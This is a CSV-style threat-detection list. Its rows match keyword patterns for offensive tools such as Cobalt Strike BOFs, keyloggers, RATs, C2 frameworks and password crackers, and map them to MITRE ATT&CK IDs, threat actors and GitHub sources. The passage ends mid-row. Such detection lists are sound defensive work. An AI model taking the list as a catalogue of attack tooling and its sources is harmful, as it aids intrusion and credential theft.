"*kernelcallbacktable.x86*",".{0,1000}kernelcallbacktable\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*kernel-exploits*",".{0,1000}kernel\-exploits.{0,1000}","offensive_tool_keyword","Github Username","github repo name hosting windows kernel exploits","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecWiki/windows-kernel-exploits","1","1","N/A","N/A","10","7825","2827","2021-06-11T23:29:15Z","2017-04-25T04:02:31Z" "*KernelMii.cna*",".{0,1000}KernelMii\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" 
"*KernelMii.x64.exe*",".{0,1000}KernelMii\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x64.o*",".{0,1000}KernelMii\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x86.exe*",".{0,1000}KernelMii\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" 
"*KernelMii.x86.o*",".{0,1000}KernelMii\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*kevin.tellier@synacktiv.com*",".{0,1000}kevin\.tellier\@synacktiv\.com.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*KevinJClark/badrats*",".{0,1000}KevinJClark\/badrats.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*Kevin-Robertson/Inveigh*",".{0,1000}Kevin\-Robertson\/Inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Key`logger running in background*",".{0,1000}Key\`logger\srunning\sin\sbackground.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*keychain2john.py*",".{0,1000}keychain2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*keylistattack.py*",".{0,1000}keylistattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*keylog_dump*",".{0,1000}keylog_dump.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*keylog_dump*",".{0,1000}keylog_dump.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylog_inject *",".{0,1000}keylog_inject\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*keylog_inject.py*",".{0,1000}keylog_inject\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*keylog_off*",".{0,1000}keylog_off.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*keylog_on*",".{0,1000}keylog_on.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*keylog_recorder.*",".{0,1000}keylog_recorder\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*keylog_recorder.rb*",".{0,1000}keylog_recorder\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*keylog_start*",".{0,1000}keylog_start.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylog_stop*",".{0,1000}keylog_stop.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylogger dump*",".{0,1000}keylogger\sdump.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","7","670","152","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z" "*Keylogger Exception - *",".{0,1000}Keylogger\sException\s\-\s.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 
- TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*keylogger is already off*",".{0,1000}keylogger\sis\salready\soff.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*keylogger stopped*",".{0,1000}keylogger\sstopped.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Keylogger*",".{0,1000}Keylogger.{0,1000}","offensive_tool_keyword","keylogger keyword","keylogger keyword. 
could be related to keylogger tools ","T1056.001 ","TA0006","N/A","N/A","POST Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Keylogger.cs*",".{0,1000}Keylogger\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*keylogger.dll*",".{0,1000}keylogger\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*KeyLogger.dll*",".{0,1000}KeyLogger\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*Keylogger.exe*",".{0,1000}Keylogger\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*Keylogger.java*",".{0,1000}Keylogger\.java.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*Keylogger.My*",".{0,1000}Keylogger\.My.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*Keylogger.pdb*",".{0,1000}Keylogger\.pdb.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*Keylogger.ps1*",".{0,1000}Keylogger\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of 
PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Keylogger.ps1*",".{0,1000}Keylogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*keylogger.py*",".{0,1000}keylogger\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*keylogger.py*",".{0,1000}keylogger\.py.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*keylogger.x64.dll*",".{0,1000}keylogger\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*KeyLoggerOffline.dll*",".{0,1000}KeyLoggerOffline\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*keylogrecorder.rb*",".{0,1000}keylogrecorder\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*keylooger.ps1*",".{0,1000}keylooger\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*keyring2john.py*",".{0,1000}keyring2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*keyscan dump*",".{0,1000}keyscan\sdump.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*keyscan start*",".{0,1000}keyscan\sstart.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*keyscan stop*",".{0,1000}keyscan\sstop.{0,1000}","offensive_tool_keyword","Slackor","A 
Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*keystore2john.py*",".{0,1000}keystore2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*KeyTabExtract*",".{0,1000}KeyTabExtract.{0,1000}","offensive_tool_keyword","KeyTabExtract","KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. Encryption Type and NTLM Hash","T1003 - T1552.004 - T1110 - T1210","TA0006 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/sosdave/KeyTabExtract","1","0","N/A","N/A","2","179","41","2020-08-26T01:03:37Z","2019-03-18T15:00:14Z" "*keyword_obfuscation*",".{0,1000}keyword_obfuscation.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 